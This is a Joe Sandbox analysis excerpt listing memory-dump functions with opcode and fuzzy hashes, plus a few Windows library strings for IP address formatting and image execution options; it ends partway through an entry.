Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e90709190e0383fb711147be5bf84cd3d7c72537bc28778727571ea680e776
Instruction ID: 8b29b98b6077d84080d84d9da80cdbb9cdcd5802fbc2fe8d7d9e2ed49813a410
Opcode Fuzzy Hash: 10e90709190e0383fb711147be5bf84cd3d7c72537bc28778727571ea680e776
Instruction Fuzzy Hash: F0900235A05C0052E141715C48945464045A7E0305B55C051E0424598CCA148A9A5361

Function 012F4650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ed070a45fef1949fb329afa0ff4081427f075402c411eecb4383d24350d94a
Instruction ID: 171117999dc358bd06cef7a2247fd4e01438e35a633f5cb9ad9e27bee41c58b8
Opcode Fuzzy Hash: d8ed070a45fef1949fb329afa0ff4081427f075402c411eecb4383d24350d94a
Instruction Fuzzy Hash: D6900265A01900829141715C48144066045A7E1305395C155A05545A4CC61889999369

Function 012F2BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9dcadf974eda2c49fc0cea3da31c5b5c783f1ea7883796f3ac79ed7b7ee04f
Instruction ID: 2acd298b7fd5264b3bbc8d17ff5dee45bf973b556af5c5962f16d9e1203a77f8
Opcode Fuzzy Hash: 1c9dcadf974eda2c49fc0cea3da31c5b5c783f1ea7883796f3ac79ed7b7ee04f
Instruction Fuzzy Hash: 05900235A0580842E151715C4424746004597D0305F55C051A0024698DC7558B9977A1

Function 012F2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c883a89c7c697361a562f41bb39bc55b08ac79fbd172def22a2920d2f026ca7
Instruction ID: 78b13298cd37f42015dafee93e4c89df66f9ee557c5b1ab4b446a95146e1103d
Opcode Fuzzy Hash: 4c883a89c7c697361a562f41bb39bc55b08ac79fbd172def22a2920d2f026ca7
Instruction Fuzzy Hash: 7990023560180842E105715C4814686004597D0305F55C051A6024699ED66589D57231

Function 012F2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f74290566d444f618ea85e6e818031ae6f38a893cfaf972d1302b4cd566ade
Instruction ID: 52820308325512396c4fb3d30a11077fa4c0b1d1fdb4051226fcfab3c75d234c
Opcode Fuzzy Hash: d8f74290566d444f618ea85e6e818031ae6f38a893cfaf972d1302b4cd566ade
Instruction Fuzzy Hash: 6A90023560584882E141715C4414A46005597D0309F55C051A00646D8DD6258E99B761

Function 012F2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1a01f974c0a8502533efdf043e3b78c3eaac17ae1990e06dc4bc79cafaf741
Instruction ID: 8ec3302b85f48942ddcc4107435947466279bfb1d3c6057c916ce5b75b3c1239
Opcode Fuzzy Hash: cb1a01f974c0a8502533efdf043e3b78c3eaac17ae1990e06dc4bc79cafaf741
Instruction Fuzzy Hash: CB90023560180842E181715C441464A004597D1305F95C055A0025698DCA158B9D77A1

Function 012F2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96b6a253708caa99e9095a9c2fddf4d277d99ce5ddf665af1d258c40f21fa19
Instruction ID: a74b8e3c51a180120f6663c91d1e82c38d350d2ada8d3d4d11f1df8631a500d3
Opcode Fuzzy Hash: c96b6a253708caa99e9095a9c2fddf4d277d99ce5ddf665af1d258c40f21fa19
Instruction Fuzzy Hash: 9F9002A5601940D29501B25C8414B0A454597E0205B55C056E10545A4CC52589959235

Function 012F2AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6284f92bad9ae7950582e4eaa602ac5f362988161d2fa2307d4ffc6cc1c8ff
Instruction ID: c8a5d90ec3f92db8db7824190e9f49afac778f8ca861c46d2646ae939cb55d01
Opcode Fuzzy Hash: 6c6284f92bad9ae7950582e4eaa602ac5f362988161d2fa2307d4ffc6cc1c8ff
Instruction Fuzzy Hash: B5900229621800425146B55C061450B0485A7D6355395C055F14165D4CC62189A95321

Function 012F2AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893f5efc80c3251fd95f66e1dfbb8012140931f82fa871df00df0226b995bb6f
Instruction ID: e6de8957ede4bdbfa23cc64c550fc3c3c82acd7d8177ce81ef4ba4e5d6540b77
Opcode Fuzzy Hash: 893f5efc80c3251fd95f66e1dfbb8012140931f82fa871df00df0226b995bb6f
Instruction Fuzzy Hash: FB900229611800435106B55C0714507008697D5355355C061F1015594CD62189A55221

Function 012F2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a4698b6335ce8b4893ab1169afd547b052e00a507cae200a028e5e894230d3
Instruction ID: cdfae4e1b9b4469696155d2245b4d22ab19260d20ae5ac4542232776767bd038
Opcode Fuzzy Hash: 60a4698b6335ce8b4893ab1169afd547b052e00a507cae200a028e5e894230d3
Instruction Fuzzy Hash: 0C90022570180043E141715C54286064045E7E1305F55D051E0414598CD915899A5322

Function 012F2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e755a64648095aefe804012f45839164b37a6ad9640e0aaa2b932e83d6536f6
Instruction ID: b8b77ebb9d5bf6009f94c298ce9b51573d59b7f2fdd73061390a8c1c32870d60
Opcode Fuzzy Hash: 2e755a64648095aefe804012f45839164b37a6ad9640e0aaa2b932e83d6536f6
Instruction Fuzzy Hash: 1F90022560584482E101755C5418A06004597D0209F55D051A10645D9DC6358995A231

Function 012F2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4d5ac5fc83b29c4b7e9b6f74319fb57a3ec2e32ee7a60f16de0d231880f3c2
Instruction ID: 1a9dfcab5dc651dbad96b46c35521e937f5d91acb411fbc997e2a9eaf54526bb
Opcode Fuzzy Hash: 3a4d5ac5fc83b29c4b7e9b6f74319fb57a3ec2e32ee7a60f16de0d231880f3c2
Instruction Fuzzy Hash: 6890022D61380042E181715C541860A004597D1206F95D455A001559CCC91589AD5321

Function 012F2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f2f3d47226ec02d722bb7ffd2a21150c66b5fcd4e0da358e283a7a363e2cd0c
Instruction ID: b2d6c91f3e8005eec4afc7484ca7c7b231e08ea05d5241a5fdf36dcb6aad31eb
Opcode Fuzzy Hash: 8f2f3d47226ec02d722bb7ffd2a21150c66b5fcd4e0da358e283a7a363e2cd0c
Instruction Fuzzy Hash: B390023564180442E142715C44146060049A7D0245F95C052A0424598EC6558B9AAB61

Function 012F2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d70b923c021626ca15a0454bd310785fb93f53a2e184b70322df6eb51d9a745
Instruction ID: 0b179ebcef0aa1e2dcb2418156232e2643b55247fc61ef2e3c7c682ddbb68d24
Opcode Fuzzy Hash: 5d70b923c021626ca15a0454bd310785fb93f53a2e184b70322df6eb51d9a745
Instruction Fuzzy Hash: E390022564284192A546B15C44145074046A7E0245795C052A1414994CC526999AD721

Function 012F2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9cefca4a64a79f6ace67c5587d18deb9c129437d465ffaba58feeb7a30760e
Instruction ID: 8331cc416c11ee83cb57293d3730d4b11b27f34306a7f2d1735342178e8ca334
Opcode Fuzzy Hash: dd9cefca4a64a79f6ace67c5587d18deb9c129437d465ffaba58feeb7a30760e
Instruction Fuzzy Hash: D890023560180882E101715C4414B46004597E0305F55C056A0124698DC615C9957621

Function 012F2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca805ef73d836b05de8f77063b742b9589bb4f6912f0566124eb02b4d98e619
Instruction ID: e0a1b3e876f82e9ac6fa29f77b1be459cd5b975ffa8d3c862d5b64e6d1acdb0d
Opcode Fuzzy Hash: 7ca805ef73d836b05de8f77063b742b9589bb4f6912f0566124eb02b4d98e619
Instruction Fuzzy Hash: 9490023560180442E101759C5418646004597E0305F55D051A5024599EC66589D56231

Function 012F2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289a3f83f84ab1dcc5d2e36a4b3b1a927a10ce9f4a3f17b42b93157ecb8bfdff
Instruction ID: 2714c9276c409be6bae43d7ab7a65662820eb9238c148350d08adba9cf5b7eef
Opcode Fuzzy Hash: 289a3f83f84ab1dcc5d2e36a4b3b1a927a10ce9f4a3f17b42b93157ecb8bfdff
Instruction Fuzzy Hash: 4490023560180443E101715C5518707004597D0205F55D451A042459CDD65689956221

Function 012F2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcd48b0a71cc167abea9f3c9be199969602f9750266d29c715e389f0a337ca6
Instruction ID: 67d8f8294fad7a86297a767c5b3df5d637adfd052bd15ffde4e72f383bfa7a2e
Opcode Fuzzy Hash: bdcd48b0a71cc167abea9f3c9be199969602f9750266d29c715e389f0a337ca6
Instruction Fuzzy Hash: BB900225A0580442E141715C5428706005597D0205F55D051A0024598DC6598B9967A1

Function 012F2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507f2a25e6d85b37f0a2182c014ad8127a606484c7341d644c82ebbe724d1c3f
Instruction ID: 639fbbc12f9f3e1b834cdad27bf0c142211ffd5e179c668a33a877d3ddfcea98
Opcode Fuzzy Hash: 507f2a25e6d85b37f0a2182c014ad8127a606484c7341d644c82ebbe724d1c3f
Instruction Fuzzy Hash: 7C90026574180482E101715C4424B060045D7E1305F55C055E1064598DC619CD966226

Function 012F2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08683c7dedf45bd3b8d7fe052f0899caf72fa2fc3f8bbca19dfe26b49d8820cb
Instruction ID: 0044d8e40ab37e28cef5a35693e5a391448fb3b277400fe0c308f653e75f867a
Opcode Fuzzy Hash: 08683c7dedf45bd3b8d7fe052f0899caf72fa2fc3f8bbca19dfe26b49d8820cb
Instruction Fuzzy Hash: 4790026561180082E105715C4414706008597E1205F55C052A2154598CC5298DA55225

Function 012F2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef97bda5e0dd0ef960611a00915c0959efe638a59d65bc3cce53224396b4637
Instruction ID: 6244a04e71c7d65b0232738d2fd85ede13cc6130c06f4bbf165df4458af59850
Opcode Fuzzy Hash: 4ef97bda5e0dd0ef960611a00915c0959efe638a59d65bc3cce53224396b4637
Instruction Fuzzy Hash: FF900235601C0442E101715C4818747004597D0306F55C051A5164599EC665C9D56631

Function 012F2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cf7a7137cae2fae5de3090ed4cf4285908d4d896cc113a72109ec2b37708d5c
Instruction ID: 34190692bd363b9eacce599852a37ef5458d91dffe3f8396d5348a8117cecf52
Opcode Fuzzy Hash: 1cf7a7137cae2fae5de3090ed4cf4285908d4d896cc113a72109ec2b37708d5c
Instruction Fuzzy Hash: ED900225A01800829141716C88549064045BBE1215755C161A0998594DC55989A95765

Function 012F2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49100aedb718bbe96f4d6293ff060d4cd1001547498395c9a09aa3990448157e
Instruction ID: d9eeece03d93f8ffbe6611faca1c97fa85e678ee7f430ce84caeb38c0a023939
Opcode Fuzzy Hash: 49100aedb718bbe96f4d6293ff060d4cd1001547498395c9a09aa3990448157e
Instruction Fuzzy Hash: BF900235601C0442E101715C482470B004597D0306F55C051A1164599DC62589956671

Function 012F2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844f8c82208a41b8afbfeea5bd421b564403b16f7357c7d4937ac76fdbca3563
Instruction ID: dce2efc50a50972b32498191e55bfd8944339d14ea056a13f40a5f5f4b03db5b
Opcode Fuzzy Hash: 844f8c82208a41b8afbfeea5bd421b564403b16f7357c7d4937ac76fdbca3563
Instruction Fuzzy Hash: 75900225611C0082E201756C4C24B07004597D0307F55C155A0154598CC91589A55621

Function 012F2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0e0cc35fa6e5f2e494ddece836a474529356883e919ce2f1144c2e1c1f44f9
Instruction ID: 8cb34b53e852ab9841d205e62016a3482c32162bf4f9f36e896f7972fc26b7da
Opcode Fuzzy Hash: fd0e0cc35fa6e5f2e494ddece836a474529356883e919ce2f1144c2e1c1f44f9
Instruction Fuzzy Hash: 6190022570180442E103715C44246060049D7D1349F95C052E1424599DC6258A97A232

Function 012F2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88bd70d515f742cd5696f7460a812aa12cb19a31b1353d3bc8aa13311f81af0
Instruction ID: a86199776a22ab5e00d9d00a04d1143a355ba44faf73875afb9015fe474f4277
Opcode Fuzzy Hash: c88bd70d515f742cd5696f7460a812aa12cb19a31b1353d3bc8aa13311f81af0
Instruction Fuzzy Hash: 6E90027560180442E141715C4414746004597D0305F55C051A5064598EC6598ED96765

Function 012F2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f4fc5e0d045f0efc2334fe8820b38e132b4d9f2220d1bb657a06bd3c73996d
Instruction ID: 50536e424b3db294850a7f7acb5383f339d96edbf2b3734a91406a166140dfe7
Opcode Fuzzy Hash: b6f4fc5e0d045f0efc2334fe8820b38e132b4d9f2220d1bb657a06bd3c73996d
Instruction Fuzzy Hash: 16900225A0180542E102715C4414616004A97D0245F95C062A1024599ECA258AD6A231

Function 012F2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e7ee289b84ffd857e97627f9f83cfc48e8b94a4465417a608cc7b959b7ead3
Instruction ID: 4271c991a0fd3bbb6f11c31e57839ca343965226a0d647e2b9f283789dc1234e
Opcode Fuzzy Hash: 41e7ee289b84ffd857e97627f9f83cfc48e8b94a4465417a608cc7b959b7ead3
Instruction Fuzzy Hash: 9F900265601C0443E141755C4814607004597D0306F55C051A2064599ECA298D956235

Function 012F3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f609327709f5f833fb7e7083e4d5f266a80e0c2a635aa3f209656ddf46b8f9
Instruction ID: 9881245b2afb11440fc2aaffc2a007675867d96c340bbdc83c5fb841743c1a3f
Opcode Fuzzy Hash: c5f609327709f5f833fb7e7083e4d5f266a80e0c2a635aa3f209656ddf46b8f9
Instruction Fuzzy Hash: F4900225601C4482E141725C4814B0F414597E1206F95C059A4156598CC91589995721

Function 012F3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a354eccce2e229ed4e1939f1b9790289545a65858fa04397226ddc74383669
Instruction ID: 63adb033d7e188291c7522e41ea0bdcda5acb1c97bb0b94d722ea7eb56c7b05a
Opcode Fuzzy Hash: a3a354eccce2e229ed4e1939f1b9790289545a65858fa04397226ddc74383669
Instruction Fuzzy Hash: 4890022564180842E141715C84247070046D7D0605F55C051A0024598DC6168AA967B1

Function 012F39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c694b7ce97e1f2553e90f03ee4d55d69427bcfa9392b4565b47f0cd5e1df8f
Instruction ID: 882c27d4e3b288d1901213467098a3eb87f479166102f125eca5e06ecd81448a
Opcode Fuzzy Hash: 17c694b7ce97e1f2553e90f03ee4d55d69427bcfa9392b4565b47f0cd5e1df8f
Instruction Fuzzy Hash: EE90022564585142E151715C44146164045B7E0205F55C061A08145D8DC55589996321

Function 012F3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 170144a1d0ab8c8e46a9471f3611671ad2033ac957cee777fc0e16f778285b64
Instruction ID: 8f8027e1a1880632cd725371f5479493ce6e76712e6bd3c6c9c39faff928f537
Opcode Fuzzy Hash: 170144a1d0ab8c8e46a9471f3611671ad2033ac957cee777fc0e16f778285b64
Instruction Fuzzy Hash: DA90023560280182E541725C5814A4E414597E1306B95D455A0015598CC91489A55321

Function 012F3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6bb75a58c1e31470c810a8b3d51a2a4b851566a2e1f335b2a0461f86a2b29da
Instruction ID: 16d0a5c0d13b1e4517de489960e2b8ba3489e58703eafcee627366e2291b166c
Opcode Fuzzy Hash: e6bb75a58c1e31470c810a8b3d51a2a4b851566a2e1f335b2a0461f86a2b29da
Instruction Fuzzy Hash: E690023960180442E511715C5814646008697D0305F55D451A042459CDC65489E5A221

Function 012F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 6c8963193191d935bed2c9f46b4b002bb5bc3c977e2c3e090d4340e6e67e30a0
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 012F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012F293C
___swprintf_l.LIBCMT ref: 012F295E
___swprintf_l.LIBCMT ref: 012F29A3
___swprintf_l.LIBCMT ref: 0132A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0132A527
ffff:, xrefs: 0132A504
::ffff:0:%u.%u.%u.%u, xrefs: 0132A54E
:%u.%u.%u.%u, xrefs: 0132A5B8

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2d438e8d1db28030f46a72353c47b5baa05f2af6e9051389e6e375083bb9232a
Instruction ID: f2e72a976374451066d2fcc6105a315fec56423cf9f1768eb060e080cf8e025a
Opcode Fuzzy Hash: 2d438e8d1db28030f46a72353c47b5baa05f2af6e9051389e6e375083bb9232a
Instruction Fuzzy Hash: 2051E5B6A10157EFCB15DBAC889097FFBB8BB09244F60813DE6A5D7681D374DE4087A0

Function 01362410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 013624A6
___swprintf_l.LIBCMT ref: 013624E2
___swprintf_l.LIBCMT ref: 0136257D
___swprintf_l.LIBCMT ref: 013625A3
___swprintf_l.LIBCMT ref: 013625C8
___swprintf_l.LIBCMT ref: 01362608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 013624DA
::%hs%u.%u.%u.%u, xrefs: 0136249E
ffff:, xrefs: 0136247D, 0136249D
:%u.%u.%u.%u, xrefs: 013625FF

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 17d89f9d2564be9151c0b8dc19487832e99de1cea099ba599b5a03804bf283cf
Instruction ID: fa2ff6d5fd44e55ed7cb49c58acfd9826ab12a9b351ab96ae3ebd6350d8124b4
Opcode Fuzzy Hash: 17d89f9d2564be9151c0b8dc19487832e99de1cea099ba599b5a03804bf283cf
Instruction Fuzzy Hash: 67512571A00646AFCB35DF9CC89097FFBFCEB44208B41C45AE5D6D7685E6B4DA408760

Function 012E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01324655
ExecuteOptions, xrefs: 013246A0
Execute=1, xrefs: 01324713
